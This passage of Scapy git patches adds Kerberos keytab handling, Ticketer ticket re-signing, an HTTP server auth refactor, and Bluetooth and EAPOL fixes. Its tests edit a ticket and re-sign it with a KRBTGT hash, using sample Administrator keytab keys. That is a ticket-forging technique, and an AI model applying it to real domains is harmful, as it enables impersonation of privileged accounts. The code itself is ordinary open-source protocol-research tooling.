from prompt_toolkit import prompt + + password = prompt("Enter password: ", is_password=True) + except ImportError: + password = input("Enter password: ") + + # If we have a mapupn, use it to retrieve the salt. + if salt is None and mapupn is not None: + salt = krb_get_salt(mapupn) + + # Detect if principal is a SPN or UPN and parse realm. + realm = None + component = None + try: + component, realm = _parse_upn(principal) + if salt is None and key is None: + salt = krb_get_salt(principal) + except ValueError: + try: + component, realm = _parse_spn(principal) + except ValueError: + raise ValueError("Invalid principal ! (must be UPN or SPN)") + + if salt is None and key is None: + raise ValueError( + "Salt could not be guessed. Please provide it, or provide 'mapupn' " + "pointing towards the UPN of the user." + ) + + # If password is provided, derive the keys. + if password: + from scapy.libs.rfc3961 import Key, EncryptionType + + if etypes is None: + etypes = [EncryptionType.AES256_CTS_HMAC_SHA1_96] + elif etypes == "all": + etypes = [ + EncryptionType.AES128_CTS_HMAC_SHA1_96, + EncryptionType.AES256_CTS_HMAC_SHA1_96, + EncryptionType.RC4_HMAC, + ] + + # For each etype, recurse. + for etype in etypes: + self.add_cred( + principal, + key=Key.string_to_key( + etype, + password.encode(), + salt=salt, + ), + ) + return + + # Get available kvno + if kvno is None: + try: + kvno = max(x.versionNumber for x in self.keytab.entries) + 1 + except ValueError: + kvno = 1 + + # Just add it. + self.keytab.entries.append( + KeytabEntry( + realm=KTCountedOctetString( + data=realm, + ), + components=[ + KTCountedOctetString( + data=x, + ) + for x in component.split("/") + ], + timestamp=int(datetime.now().timestamp()), + vno8=kvno if kvno < 256 else None, + key=KTKeyBlock( + keytype=key.etype, + keyvalue=key.key, + ), + vno=None if kvno < 256 else kvno, + _parent=self.keytab, + ) + ) + + def get_cred(self, principal, etype=None): + """ + Get credential from the Keytab by principal. + """ + for entry in self.keytab.entries: + if entry.getPrincipal() == principal: + if etype is not None and etype != entry.key.keytype: + continue + return entry.key.toKey() + raise ValueError( + "Principal not found in keytab ! " + "Note principals are case sensitive, as on ktpass.exe" ) + def ssp(self, i): + """ + Create a KerberosSSP from a ticket or from the keystore. + + :param i: index of the ticket to use from ccache (client) + OR SPN of the key to use from the keystore (server) + """ + if isinstance(i, int): + ticket, sessionkey, upn, spn = self.export_krb(i) + return KerberosSSP( + ST=ticket, + KEY=sessionkey, + UPN=upn, + SPN=spn, + ) + elif isinstance(i, str): + spn = i + key = self.get_cred(spn) + return KerberosSSP( + SPN=spn, + KEY=key, + ) + else: + raise ValueError("Invalid 'i' value. Must be int or str") + def _add_cred(self, decTkt, hash=None, kdc_hash=None): """ Add a decoded ticket to the CCache @@ -1007,29 +1278,35 @@ def _build_ticket(self, store): "VI.UserAccountControl" ], Reserved3=[0, 0, 0, 0, 0, 0, 0], - ExtraSids=[ - KERB_SID_AND_ATTRIBUTES( - Sid=self._build_sid(x["Sid"]), - Attributes=x["Attributes"], - ) - for x in store["VI.ExtraSids"] - ] - if store["VI.ExtraSids"] - else None, + ExtraSids=( + [ + KERB_SID_AND_ATTRIBUTES( + Sid=self._build_sid( + x["Sid"] + ), + Attributes=x["Attributes"], + ) + for x in store["VI.ExtraSids"] + ] + if store["VI.ExtraSids"] + else None + ), ResourceGroupDomainSid=self._build_sid( store["VI.ResourceGroupDomainSid"] ), - ResourceGroupIds=[ - GROUP_MEMBERSHIP( - RelativeId=x["RelativeId"], - Attributes=x["Attributes"], - ) - for x in store[ - "VI.ResourceGroupIds" + ResourceGroupIds=( + [ + GROUP_MEMBERSHIP( + RelativeId=x["RelativeId"], + Attributes=x["Attributes"], + ) + for x in store[ + "VI.ResourceGroupIds" + ] ] - ] - if store["VI.ResourceGroupIds"] - else None, + if store["VI.ResourceGroupIds"] + else None + ), ), ] + ( @@ -1170,12 +1447,6 @@ def _build_ticket(self, store): ), ) - def _getPayloadIfExist(self, pac, ulType): - for i, buf in enumerate(pac.Buffers): - if buf.ulType == ulType: - return pac.Payloads[i] - return None - def _make_fields(self, element, fields, datastore=None): frm = ttk.Frame(element) frm.pack(fill="x") @@ -1346,7 +1617,7 @@ def _pretty_sid(self, sid): return sid.summary() def _getLogonInformation(self, pac, element): - logonInfo = self._getPayloadIfExist(pac, 0x00000001) + logonInfo = pac.getPayload(0x00000001) if not logonInfo: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000001)) logonInfo = KERB_VALIDATION_INFO() @@ -1473,7 +1744,7 @@ def _getLogonInformation(self, pac, element): ) def _getClientInfo(self, pac, element): - clientInfo = self._getPayloadIfExist(pac, 0x0000000A) + clientInfo = pac.getPayload(0x0000000A) if not clientInfo: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x0000000A)) clientInfo = PAC_CLIENT_INFO() @@ -1486,7 +1757,7 @@ def _getClientInfo(self, pac, element): ) def _getUPNDnsInfo(self, pac, element): - upndnsinfo = self._getPayloadIfExist(pac, 0x0000000C) + upndnsinfo = pac.getPayload(0x0000000C) if not upndnsinfo: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x0000000C)) upndnsinfo = UPN_DNS_INFO() @@ -1497,21 +1768,25 @@ def _getUPNDnsInfo(self, pac, element): ("DnsDomainName", upndnsinfo.DnsDomainName), ( "SamName", - upndnsinfo.SamName - if upndnsinfo.Flags.S and upndnsinfo.SamNameLen - else "", + ( + upndnsinfo.SamName + if upndnsinfo.Flags.S and upndnsinfo.SamNameLen + else "" + ), ), ( "UpnDnsSid", - self._pretty_sid(upndnsinfo.Sid) - if upndnsinfo.Flags.S and upndnsinfo.SidLen - else "", + ( + self._pretty_sid(upndnsinfo.Sid) + if upndnsinfo.Flags.S and upndnsinfo.SidLen + else "" + ), ), ], ) def _getClientClaims(self, pac, element): - clientClaims = self._getPayloadIfExist(pac, 0x0000000D) + clientClaims = pac.getPayload(0x0000000D) if not clientClaims or isinstance(clientClaims, conf.padding_layer): pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x0000000D)) claimsArray = [] @@ -1557,7 +1832,7 @@ def func(elt, x, datastore): ) def _getPACAttributes(self, pac, element): - pacAttributes = self._getPayloadIfExist(pac, 0x00000011) + pacAttributes = pac.getPayload(0x00000011) if not pacAttributes: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000011)) pacAttributes = PAC_ATTRIBUTES_INFO(Flags=0) @@ -1574,7 +1849,7 @@ def _getPACAttributes(self, pac, element): ) def _getPACRequestor(self, pac, element): - pacRequestor = self._getPayloadIfExist(pac, 0x00000012) + pacRequestor = pac.getPayload(0x00000012) if not pacRequestor: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000012)) pacRequestor = PAC_REQUESTOR() @@ -1583,7 +1858,7 @@ def _getPACRequestor(self, pac, element): ) def _getServerChecksum(self, pac, element): - serverChecksum = self._getPayloadIfExist(pac, 0x00000006) + serverChecksum = pac.getPayload(0x00000006) if not serverChecksum: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000006)) serverChecksum = PAC_SIGNATURE_DATA() @@ -1592,9 +1867,11 @@ def _getServerChecksum(self, pac, element): [ ( "SRVSignatureType", - str(serverChecksum.SignatureType) - if serverChecksum.SignatureType is not None - else "", + ( + str(serverChecksum.SignatureType) + if serverChecksum.SignatureType is not None + else "" + ), ), ("SRVSignature", bytes_hex(serverChecksum.Signature).decode()), ("SRVRODCIdentifier", serverChecksum.RODCIdentifier.decode()), @@ -1602,7 +1879,7 @@ def _getServerChecksum(self, pac, element): ) def _getKDCChecksum(self, pac, element): - kdcChecksum = self._getPayloadIfExist(pac, 0x00000007) + kdcChecksum = pac.getPayload(0x00000007) if not kdcChecksum: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000007)) kdcChecksum = PAC_SIGNATURE_DATA() @@ -1611,9 +1888,11 @@ def _getKDCChecksum(self, pac, element): [ ( "KDCSignatureType", - str(kdcChecksum.SignatureType) - if kdcChecksum.SignatureType is not None - else "", + ( + str(kdcChecksum.SignatureType) + if kdcChecksum.SignatureType is not None + else "" + ), ), ("KDCSignature", bytes_hex(kdcChecksum.Signature).decode()), ("KDCRODCIdentifier", kdcChecksum.RODCIdentifier.decode()), @@ -1621,7 +1900,7 @@ def _getKDCChecksum(self, pac, element): ) def _getTicketChecksum(self, pac, element): - ticketChecksum = self._getPayloadIfExist(pac, 0x00000010) + ticketChecksum = pac.getPayload(0x00000010) if not ticketChecksum: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000010)) ticketChecksum = PAC_SIGNATURE_DATA() @@ -1630,9 +1909,11 @@ def _getTicketChecksum(self, pac, element): [ ( "TKTSignatureType", - str(ticketChecksum.SignatureType) - if ticketChecksum.SignatureType is not None - else "", + ( + str(ticketChecksum.SignatureType) + if ticketChecksum.SignatureType is not None + else "" + ), ), ("TKTSignature", bytes_hex(ticketChecksum.Signature).decode()), ("TKTRODCIdentifier", ticketChecksum.RODCIdentifier.decode()), @@ -1640,7 +1921,7 @@ def _getTicketChecksum(self, pac, element): ) def _getExtendedKDCChecksum(self, pac, element): - exkdcChecksum = self._getPayloadIfExist(pac, 0x00000013) + exkdcChecksum = pac.getPayload(0x00000013) if not exkdcChecksum: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000013)) exkdcChecksum = PAC_SIGNATURE_DATA() @@ -1649,9 +1930,11 @@ def _getExtendedKDCChecksum(self, pac, element): [ ( "EXKDCSignatureType", - str(exkdcChecksum.SignatureType) - if exkdcChecksum.SignatureType is not None - else "", + ( + str(exkdcChecksum.SignatureType) + if exkdcChecksum.SignatureType is not None + else "" + ), ), ("EXKDCSignature", bytes_hex(exkdcChecksum.Signature).decode()), ("EXKDCRODCIdentifier", exkdcChecksum.RODCIdentifier.decode()), @@ -2074,10 +2357,10 @@ def _resign_ticket(self, tkt, spn, hash=None, kdc_hash=None): # "The ad-data in the PAC’s AuthorizationData element ([RFC4120] # section 5.2.6) is replaced with a single zero byte" tmp_tkt.authorizationData.seq[0].adData.seq[0].adData = b"\x00" - rpac.Payloads[ - sig_i[0x00000010] - ].Signature = ticket_sig = key_kdc.make_checksum( - 17, bytes(tmp_tkt) # KERB_NON_KERB_CKSUM_SALT(17) + rpac.Payloads[sig_i[0x00000010]].Signature = ticket_sig = ( + key_kdc.make_checksum( + 17, bytes(tmp_tkt) # KERB_NON_KERB_CKSUM_SALT(17) + ) ) # included in the PAC when signing it for Extended Server Signature & Server Signature pac.Payloads[sig_i[0x00000010]].Signature = ticket_sig @@ -2085,10 +2368,8 @@ def _resign_ticket(self, tkt, spn, hash=None, kdc_hash=None): # sect 2.8.4 - Extended KDC Signature if 0x00000013 in sig_i: - rpac.Payloads[ - sig_i[0x00000013] - ].Signature = extended_kdc_sig = key_kdc.make_checksum( - 17, bytes(pac) # KERB_NON_KERB_CKSUM_SALT(17) + rpac.Payloads[sig_i[0x00000013]].Signature = extended_kdc_sig = ( + key_kdc.make_checksum(17, bytes(pac)) # KERB_NON_KERB_CKSUM_SALT(17) ) # included in the PAC when signing it for Server Signature pac.Payloads[sig_i[0x00000013]].Signature = extended_kdc_sig @@ -2126,6 +2407,7 @@ def request_tgt( realm=None, fast=False, armor_with=None, + spn=None, **kwargs, ): """ @@ -2133,6 +2415,14 @@ def request_tgt( See :func:`~scapy.layers.kerberos.krb_as_req` for the full documentation. """ + if key is None and password is None: + # Do we have the credential in our Keystore ? + try: + key = self.get_cred(upn) + except ValueError: + # It's okay if we don't have the cred. krb_as_req will prompt. + pass + # If `armor_with` is specified, get the armor ticket from our store armor_ticket, armor_ticket_skey, armor_ticket_upn = None, None, None if armor_with is not None: @@ -2151,6 +2441,7 @@ def request_tgt( armor_ticket=armor_ticket, armor_ticket_upn=armor_ticket_upn, armor_ticket_skey=armor_ticket_skey, + spn=spn, **kwargs, ) if not res: @@ -2165,7 +2456,7 @@ def request_st( ip=None, renew=False, realm=None, - additional_tickets=[], + additional_tickets=None, fast=False, armor_with=None, for_user=None, @@ -2187,6 +2478,9 @@ def request_st( """ ticket, sessionkey, upn, _ = self.export_krb(i) + if additional_tickets is None: + additional_tickets = [] + # If `armor_with` is specified, get the armor ticket from our store armor_ticket, armor_ticket_skey, armor_ticket_upn = None, None, None if armor_with is not None: @@ -2208,6 +2502,7 @@ def request_st( ip=ip, renew=renew, realm=realm, + s4u2proxy=s4u2proxy, additional_tickets=additional_tickets, fast=fast, for_user=for_user, diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index c7b9325e9ea..fc96f8ccd8c 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -894,7 +894,7 @@ with open(TICKETER_TEMPFILE, "wb") as fd: = Ticketer++ - Create and load Ticketer object t = Ticketer() -t.open_file(TICKETER_TEMPFILE) +t.open_ccache(TICKETER_TEMPFILE) = Ticketer++ - Get ticket 0, change it, resign it and set it back @@ -911,7 +911,7 @@ with mock.patch('scapy.libs.rfc3961.os.urandom', side_effect=fake_random): tkt.renewTill.val = '20220930172927Z' t.update_ticket(0, tkt, resign=True, hash=KRBTGT, kdc_hash=KRBTGT) -= Ticketer++ - Call show() += Ticketer++ - Call show() with ccache with ContextManagerCaptureOutput() as cmco: t.show(utc=True) @@ -920,7 +920,7 @@ with ContextManagerCaptureOutput() as cmco: print(outp) assert outp == """ -Tickets: +CCache tickets: 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL canonicalize+pre-authent+initial+renewable+proxiable+forwardable Start time End time Renew until Auth time @@ -929,7 +929,7 @@ Start time End time Renew until Auth time = Ticketer++ - Save to disk -t.save() +t.save_ccache() = Ticketer++ - Read and check written ccache @@ -955,6 +955,64 @@ assert bytes(tkt) == bytes(TKT) assert upn == 'DC1$@DOMAIN.LOCAL' assert spn == 'krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL' += Ticketer++ - Create keytab + +t = Ticketer() +t.add_cred("host/dc.domain.local", password="Scapy1", salt=b"salt") + +assert t.get_cred("host/dc.domain.local").key == bytes.fromhex("811f44006ad73972ffec42cc89ce6e79749e6effd8db4db5fb0f38c0f3fa6f4f") + += Ticketer++ - Get SPN ssp + +ssp = t.ssp("host/dc.domain.local") + += Ticketer++ - Load keytab + +from scapy.utils import get_temp_file +TICKETER_TEMPFILE = get_temp_file() + +KEYTAB_DATA = bytes.fromhex("0502000000440001000c646f6d61696e2e6c6f63616c000d41646d696e6973747261746f720000000067fd666f0100110010de93a48926de94c2feff6abd8e0e763b00000000000000540001000c646f6d61696e2e6c6f63616c000d41646d696e6973747261746f720000000067fd666f0200120020dcd8ce2bb77dfb6cab0e1afb69a9a5713a8818ed502c3625edc7772e6b4c442a00000000000000440001000c646f6d61696e2e6c6f63616c000d41646d696e6973747261746f720000000067fd666f03001700102b576acbe6bcfda7294d6bd18041b8fe00000000") + +with open(TICKETER_TEMPFILE, "wb") as fd: + fd.write(KEYTAB_DATA) + +t = Ticketer() +t.open_keytab(TICKETER_TEMPFILE) + +assert t.get_cred("Administrator@domain.local", EncryptionType.RC4_HMAC).key == b'+Wj\xcb\xe6\xbc\xfd\xa7)Mk\xd1\x80A\xb8\xfe' +assert t.get_cred("Administrator@domain.local", EncryptionType.AES128_CTS_HMAC_SHA1_96).key == b'\xde\x93\xa4\x89&\xde\x94\xc2\xfe\xffj\xbd\x8e\x0ev;' + += Ticketer++ - Call show() with keytab + +with ContextManagerCaptureOutput() as cmco: + t.show(utc=True) + outp = cmco.get_output().strip() + +# crop first line +outp = outp.split("\n", 1)[1] + +print(repr(outp)) + +assert outp == """ +Principal Timestamp KVNO Keytype +Administrator@domain.local 14/04/25 19:47:59 0 AES128-CTS-HMAC-SHA1-96 +Administrator@domain.local 14/04/25 19:47:59 0 AES256-CTS-HMAC-SHA1-96 +Administrator@domain.local 14/04/25 19:47:59 0 RC4-HMAC + +No tickets in CCache. +""".strip() + += Ticketer++ - Get UPN ssp + +ssp = t.ssp("Administrator@domain.local") + += Ticketer++ - Save keytab + +from scapy.utils import get_temp_file +TICKETER_TEMPFILE = get_temp_file() + +t.save_keytab(TICKETER_TEMPFILE) + + Crypto tests = RFC3691 - Test vectors for KRB-FX-CF2 From d947ff1afd3387b4bfbc1d129eb89f121d1e064f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 18 Apr 2025 11:46:07 +0200 Subject: [PATCH 1456/1632] Better logging, cleanup of HTTP_Server code, fix in ChannelBindings of Kerberos (#4720) --- scapy/layers/http.py | 81 ++++++++++++++++++++++------------------ scapy/layers/kerberos.py | 20 +++++++--- 2 files changed, 59 insertions(+), 42 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 00f1b9d6f18..f8a74e7b2b3 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -1073,47 +1073,17 @@ def BEGIN(self): self.authenticated = False self.sspcontext = None - @ATMT.condition(BEGIN, prio=0) - def should_authenticate(self): + @ATMT.receive_condition(BEGIN, prio=1) + def should_authenticate(self, pkt): if self.authmethod == HTTP_AUTH_MECHS.NONE.value: - raise self.SERVE() + raise self.SERVE(pkt) else: - raise self.AUTH() + raise self.AUTH(pkt) @ATMT.state() - def AUTH(self): - pass - - @ATMT.state() - def AUTH_ERROR(self, proxy): - self.sspcontext = None - self._ask_authorization(proxy, self.authmethod) - self.vprint("AUTH ERROR") - - @ATMT.condition(AUTH_ERROR) - def allow_reauth(self): - raise self.AUTH() - - def _ask_authorization(self, proxy, data): - if proxy: - self.send( - HTTPResponse( - Status_Code=b"407", - Reason_Phrase=b"Proxy Authentication Required", - Proxy_Authenticate=data, - ) - ) - else: - self.send( - HTTPResponse( - Status_Code=b"401", - Reason_Phrase=b"Unauthorized", - WWW_Authenticate=data, - ) - ) - - @ATMT.receive_condition(AUTH, prio=1) - def received_unauthenticated(self, pkt): + def AUTH(self, pkt=None): + if pkt is None: + return if HTTPRequest in pkt: self.vprint(pkt.summary()) if pkt.Method == b"CONNECT": @@ -1137,10 +1107,12 @@ def received_unauthenticated(self, pkt): # Parse authorization method, data = authorization.split(b" ", 1) if plain_str(method) != self.authmethod: + self.debug(3, "Bad auth method.") raise self.AUTH_ERROR(proxy) try: data = base64.b64decode(data) except Exception: + self.debug(3, "Couldn't unpack base64 of auth.") raise self.AUTH_ERROR(proxy) # Now process the authorization if not self.basic: @@ -1149,6 +1121,7 @@ def received_unauthenticated(self, pkt): except Exception: self.sspcontext = None self._ask_authorization(proxy, self.authmethod) + self.debug(3, "Couldn't unpack GSSAPI_BLOB of auth.") raise self.AUTH_ERROR(proxy) # And call the SSP self.sspcontext, tok, status = self.ssp.GSS_Accept_sec_context( @@ -1164,9 +1137,11 @@ def received_unauthenticated(self, pkt): ) tok, status = None, GSS_S_COMPLETE except StopIteration: + self.debug(3, "Basic authentication failed with 'unknown user'.") tok, status = None, GSS_S_FAILURE # Send answer if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: + self.debug(3, "Authentication failed.") raise self.AUTH_ERROR(proxy) elif status == GSS_S_CONTINUE_NEEDED: data = self.authmethod.encode() @@ -1180,6 +1155,38 @@ def received_unauthenticated(self, pkt): self.vprint("AUTH OK") raise self.SERVE(pkt) + @ATMT.state() + def AUTH_ERROR(self, proxy): + self.sspcontext = None + self._ask_authorization(proxy, self.authmethod) + self.vprint("AUTH ERROR") + + @ATMT.condition(AUTH_ERROR) + def allow_reauth(self): + raise self.AUTH() + + def _ask_authorization(self, proxy, data): + if proxy: + self.send( + HTTPResponse( + Status_Code=b"407", + Reason_Phrase=b"Proxy Authentication Required", + Proxy_Authenticate=data, + ) + ) + else: + self.send( + HTTPResponse( + Status_Code=b"401", + Reason_Phrase=b"Unauthorized", + WWW_Authenticate=data, + ) + ) + + @ATMT.receive_condition(AUTH, prio=1) + def received_unauthenticated(self, pkt): + raise self.AUTH(pkt) + @ATMT.eof(AUTH) def auth_eof(self): raise self.CLOSED() diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index f7b0cc19a46..b4d5d59f767 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -2108,11 +2108,21 @@ class KRB_GSS_EXT(Packet): class KRB_AuthenticatorChecksum(Packet): fields_desc = [ FieldLenField("Lgth", None, length_of="Bnd", fmt=" Date: Mon, 21 Apr 2025 21:54:24 +0100 Subject: [PATCH 1457/1632] Clean up remains of field_pos_list (#4714) The field is no longer used anywhere, but it was still in a function doc and as an argument for Padding.self_build. --- scapy/packet.py | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 0e7edee4938..8c558513157 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -694,8 +694,6 @@ def self_build(self): # type: () -> bytes """ Create the default layer regarding fields_desc dict - - :param field_pos_list: """ if self.raw_packet_cache is not None and \ self.raw_packet_cache_fields is not None: @@ -2008,7 +2006,7 @@ def mysummary(self): class Padding(Raw): name = "Padding" - def self_build(self, field_pos_list=None): + def self_build(self): # type: (Optional[Any]) -> bytes return b"" From 9363bfd80d31a7ee9a0457c5b3505fccaf8bc4b1 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Mon, 21 Apr 2025 22:55:32 +0200 Subject: [PATCH 1458/1632] Bluetooth: Make EIR_AdvertisingInterval variable length (#4711) --- scapy/layers/bluetooth.py | 15 ++++++++++++++- test/scapy/layers/bluetooth.uts | 4 ++++ 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 4962babee10..e4f7113c9fa 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -56,6 +56,7 @@ XLEIntField, LEMACField, BitEnumField, + LEThreeBytesField, ) from scapy.supersocket import SuperSocket from scapy.sendrecv import sndrcv @@ -1266,7 +1267,19 @@ class EIR_PublicTargetAddress(EIR_Element): class EIR_AdvertisingInterval(EIR_Element): name = "Advertising Interval" fields_desc = [ - LEShortField("advertising_interval", 0) + MultipleTypeField( + [ + (ByteField("advertising_interval", 0), + lambda p: p.underlayer.len - 1 == 1), + (LEShortField("advertising_interval", 0), + lambda p: p.underlayer.len - 1 == 2), + (LEThreeBytesField("advertising_interval", 0), + lambda p: p.underlayer.len - 1 == 3), + (LEIntField("advertising_interval", 0), + lambda p: p.underlayer.len - 1 == 4), + ], + LEShortField("advertising_interval", 0) + ) ] diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 9072aa1d31a..0fb23b1ef20 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -481,6 +481,10 @@ p = HCI_Event_Hdr(hex_bytes('3e23020100002e4961121110170201060f0954656c655361742 assert EIR_AdvertisingInterval in p assert p[EIR_AdvertisingInterval].advertising_interval == 400 +p = BTLE(hex_bytes('d6be898e20234fe761e5b754021a1803030a18020ace12fffa07104a2b010000000054b7e561e74f00000000')) +assert EIR_AdvertisingInterval in p +assert p[EIR_AdvertisingInterval].advertising_interval == 24 + = Parse EIR_LEBluetoothDeviceAddress p = HCI_Event_Hdr(hex_bytes("3e2a02010000d93519d7ba4c1e0201020affc4000734151317fd80081b00d93519d7ba4c0303b9fe020ad4ad")) assert EIR_LEBluetoothDeviceAddress in p From d21519229b1d114ee856354d268db83186e52fa0 Mon Sep 17 00:00:00 2001 From: Simon Holesch <8659229+holesch@users.noreply.github.com> Date: Mon, 21 Apr 2025 23:07:16 +0200 Subject: [PATCH 1459/1632] CONTRIBUTING: Drop Python 2 requirement (#4713) Since 246ad3fe ("Drop six library (first batch)") scapy doesn't support Python 2 anymore. Drop the requirement in CONTRIBUTING.md. --- CONTRIBUTING.md | 16 ---------------- 1 file changed, 16 deletions(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 885b84fa249..7c1efcd9064 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -136,22 +136,6 @@ make sure logging in Scapy remains helpful. - If you are working on Scapy's core, you may use: `scapy.error.log_loading` only while Scapy is loading, to display import errors for instance. - -### Python 2 and 3 compatibility - -The project aims to provide code that works both on Python 2 and Python 3. Therefore, some rules need to be applied to achieve compatibility: - -- byte-string must be defined as `b"\x00\x01\x02"` -- exceptions must comply with the new Python 3 format: `except SomeError as e:` -- lambdas must be written using a single argument when using tuples: use `lambda x, y: x + f(y)` instead of `lambda (x, y): x + f(y)`. -- use int instead of long -- use list comprehension instead of map() and filter() -- `__bool__ = __nonzero__` must be used when declaring `__nonzero__` methods -- `__next__ = next` must be used when declaring `next` methods in iterators -- `StopIteration` must NOT be used in generators (but it can still be used in iterators) -- `io.BytesIO` must be used instead of `StringIO` when using bytes -- `__cmp__` must not be used. - ### Code review Maintainers tend to be picky, and you might feel frustrated that your From d876346dcc57f8fce8bdb45795c973f8c126f572 Mon Sep 17 00:00:00 2001 From: birdiecode <78822509+birdiecode@users.noreply.github.com> Date: Tue, 22 Apr 2025 00:21:01 +0300 Subject: [PATCH 1460/1632] Fix: replace data variable with trigger variable in EAPOL_KEY.guess_key_number (#4703) * Fix: replace data variable with trigger variable in [EAPOL_KEY.guess_key_number] * Update EAPOL-Key 1 test --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/eap.py | 2 +- test/scapy/layers/eap.uts | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/eap.py b/scapy/layers/eap.py index 4f0d7cda53c..2894570c18a 100644 --- a/scapy/layers/eap.py +++ b/scapy/layers/eap.py @@ -494,7 +494,7 @@ def guess_key_number(self): """ if self.key_type == 1: if self.key_ack == 1: - if self.key_mic == 0: + if self.has_key_mic == 0: return 1 if self.install == 1: return 3 diff --git a/test/scapy/layers/eap.uts b/test/scapy/layers/eap.uts index 3a251cca897..63034af74a3 100644 --- a/test/scapy/layers/eap.uts +++ b/test/scapy/layers/eap.uts @@ -86,7 +86,7 @@ assert(eapol_key.key_ack == 1) assert(eapol_key.key_mic == b"\x00" * 16) assert(eapol_key.secure == 0) assert(eapol_key.key_data_length == 22) -assert(eapol_key.guess_key_number() == 0) +assert(eapol_key.guess_key_number() == 1) = EAPOL_KEY - Key 2 - Dissection (2) s = b'\x02\x03\x00\x75\x02\x01\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x60\x5e\x85\xa7\x9c\xfa\xfd\xb0\xea\xa0\x50\x68\x3f\x97\xbe\x1b\x66\xde\xf7\xbc\x65\x20\x57\x31\x68\x71\xc2\x73\xc5\xae\x47\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\x89\xcd\xf1\x88\x54\x8e\x73\xcd\x37\xd5\x78\x52\x66\x05\x88\x00\x16\x30\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x28\x00' From fa70dbf78cf0d5a01aa50a51441c2a38d687ef79 Mon Sep 17 00:00:00 2001 From: tryger Date: Mon, 21 Apr 2025 23:37:26 +0200 Subject: [PATCH 1461/1632] BLE: Add HCI_LE_Meta_Extended_Advertising_Report event (#4686) * Add HCI_LE_Meta_Extended_Advertising_Report * Update scapy/layers/bluetooth.py --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/bluetooth.py | 64 +++++++++++++++++++++++++++++++++ test/scapy/layers/bluetooth.uts | 53 +++++++++++++++++++++++++++ 2 files changed, 117 insertions(+) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index e4f7113c9fa..7d7208e679b 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -2531,6 +2531,69 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): XLEShortField("ediv", 0), ] +class HCI_LE_Meta_Extended_Advertising_Report(Packet): + name = "Extended Advertising Report" + fields_desc = [ + BitField("reserved0", 0, 1), + BitEnumField("data_status", 0, 2, { + 0b00: "complete", + 0b01: "incomplete", + 0b10: "incomplete_truncated", + 0b11: "reserved" + }), + BitField("legacy", 0, 1), + BitField("scan_response", 0, 1), + BitField("directed", 0, 1), + BitField("scannable", 0, 1), + BitField("connectable", 0, 1), + ByteField("reserved", 0), + ByteEnumField("address_type", 0, { + 0x00: "public_device_address", + 0x01: "random_device_address", + 0x02: "public_identity_address", + 0x03: "random_identity_address", + 0xff: "anonymous" + }), + LEMACField('address', None), + ByteEnumField("primary_phy", 0, { + 0x01: "le_1m", + 0x03: "le_coded_s8", + 0x04: "le_coded_s2" + }), + ByteEnumField("secondary_phy", 0, { + 0x01: "le_1m", + 0x02: "le_2m", + 0x03: "le_coded_s8", + 0x04: "le_coded_s2" + }), + ByteField("advertising_sid", 0xff), + ByteField("tx_power", 0x7f), + SignedByteField("rssi", 0x00), + LEShortField("periodic_advertising_interval", 0x0000), + ByteEnumField("direct_address_type", 0, { + 0x00: "public_device_address", + 0x01: "non_resolvable_private_address", + 0x02: "resolvable_private_address_resolved_0", + 0x03: "resolvable_private_address_resolved_1", + 0xfe: "resolvable_private_address_unable_resolve"}), + LEMACField("direct_address", None), + FieldLenField("data_length", None, length_of="data", fmt="B"), + PacketListField("data", [], EIR_Hdr, + length_from=lambda pkt: pkt.data_length), + ] + + def extract_padding(self, s): + return '', s + + +class HCI_LE_Meta_Extended_Advertising_Reports(Packet): + name = "Extended Advertising Reports" + fields_desc = [FieldLenField("num_reports", None, count_of="reports", fmt="B"), + PacketListField("reports", None, + HCI_LE_Meta_Extended_Advertising_Report, + count_from=lambda pkt: pkt.num_reports)] + + bind_layers(HCI_PHDR_Hdr, HCI_Hdr) bind_layers(HCI_Hdr, 